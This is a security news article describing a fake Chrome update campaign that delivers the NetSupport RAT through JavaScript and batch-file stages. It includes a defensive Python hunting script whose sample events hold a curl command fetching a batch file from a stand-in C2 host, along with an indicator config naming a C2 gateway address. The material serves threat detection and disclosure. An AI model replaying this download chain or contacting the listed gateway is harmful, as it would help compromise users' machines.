Beware of Fake Chrome Browser Updates that Install Malware

Reports indicate an apparently ongoing campaign that uses fake Chrome browser updates to lure victims into installing a remote administration tool called NetSupport Manager.

Threat actors use this remote administration software as an info stealer and to take control of victims' computers. Investigations point to a suspected SocGholish campaign, which was previously conducted by a Russian threat actor, but the attribution remains inconclusive.

Fake Chromium updates campaign (Source: Trellix)

The SVP of Trellix Advanced Research Center stated that “Chromium with 63.55% of market share is now the de facto most targeted browser for NetSupport RAT attacks, due to the global usage. Organizations need holistic global threat intelligence and innovative security solutions to get the governance and tools needed to reduce the cyber risk.”


Fake Chrome Browser Update

These fake Chromium updates are spread through compromised websites that have been injected with a simple HTML script tag, which loads malicious JavaScript content from the threat actors' C2 servers. The injection process appears to be automated and follows a directory structure.

Further analysis showed many compromised websites with traffic from the federal government, financial institutions, and consulting services. These compromised websites can be detected by checking for the “/cdn-js/wds.min.php” path.

Previously, threat actors used PowerShell with WMI functionality to download and install the RAT. The current campaign instead uses batch files (.bat), VBScript files, and curl for the RAT download.

When a user clicks the fake browser update link, it downloads a ZIP archive, “UpdateInstall.zip”, which contains a malicious JS file named “Browser_portable.js” that acts as a next-stage malware downloader.

The second-stage JS file, “Chrome_update.js”, is retrieved from the threat actors' C2 server and executed. It downloads a batch file, “1.bat”, to the local “C://ProgramData” folder and runs it.

In addition, 1.bat drops VBScript and batch files that the investigation found to be dummies, as they were never executed. Further components and the final batch script, 2.bat, are downloaded using curl commands.

These components include a 7-Zip archive containing the NetSupport Manager RAT software package, which is executed by the 2.bat file.
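The download chain described above can be hunted for in process-creation telemetry by correlating its stages per host. The following is an added example, not code from Trellix or from the original article; the event tuple format, the `wscript.exe`/`cscript.exe` script host, the stage names and the sample events are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

SCRIPT_HOST = re.compile(r'^[wc]script(\.exe)?$', re.I)  # assumed handler for .js files
CMD = re.compile(r'^cmd(\.exe)?$', re.I)

# (stage name, required parent image or None, command-line pattern)
STAGES = [
    # Stage 1: a .js run straight out of a ZIP, or one of the reported file names
    ("js_downloader", None, re.compile(
        r'\b[wc]script(\.exe)?\b.*(\.zip\\[^"]*\.js|Browser_portable\.js|Chrome_update\.js)', re.I)),
    # Stage 2: the script host launches a batch file from ProgramData (1.bat)
    ("programdata_bat", SCRIPT_HOST, re.compile(r'\\ProgramData\\[^\\"\s]+\.bat\b', re.I)),
    # Stage 3: the batch file uses curl to pull more scripts, archives or binaries
    ("curl_payload", CMD, re.compile(r'\bcurl(\.exe)?\s+.*\.(bat|7z|exe)(\s|\?|$)', re.I)),
    # Stage 4: a 7-Zip binary unpacks a .7z archive
    ("7z_unpack", None, re.compile(r'\b7z[a-z]*(\.exe)?\s+.*\.7z\b', re.I)),
]

# Constructed sample events: (host, parent image, command line)
SAMPLE_EVENTS = [
    ("ws-01", "explorer.exe",
     r'wscript.exe "C:\Users\a\AppData\Local\Temp\Temp1_UpdateInstall.zip\Browser_portable.js"'),
    ("ws-01", "wscript.exe", r'cmd.exe /c C:\ProgramData\1.bat'),
    ("ws-01", "cmd.exe", r'curl.exe -o C:\ProgramData\2.bat https://c2.example/2.bat'),
    ("ws-01", "cmd.exe", r'C:\ProgramData\7zz.exe x C:\ProgramData\tempy.7z'),
    ("ws-02", "cmd.exe", r'curl.exe -s https://intranet.example/health'),  # benign curl
    ("ws-03", "explorer.exe", r'wscript.exe C:\Scripts\inventory.js'),      # benign script
]

def hosts_matching_chain(events, min_stages=3):
    """Return {host: [stages seen]} for hosts with at least min_stages distinct stages."""
    seen = defaultdict(set)
    for host, parent, cmdline in events:
        for name, parent_re, cmd_re in STAGES:
            parent_ok = parent_re is None or parent_re.search(parent)
            if parent_ok and cmd_re.search(cmdline):
                seen[host].add(name)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, stages in hosts_matching_chain(SAMPLE_EVENTS).items():
        print(host, stages)
```

Requiring several distinct stages on one host keeps a lone curl call or an ordinary admin script from raising an alert on its own.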

A complete report has been published by Trellix, which provides detailed information on this campaign and the malware source code.

Indicators of Compromise


Files

Client32 config
[HTTP]
CMPI=60
GatewayAddress=5.252.178.48:443
GSK=GA;L@KDPHB
Port=443
SecondaryGateway=
SecondaryPort=
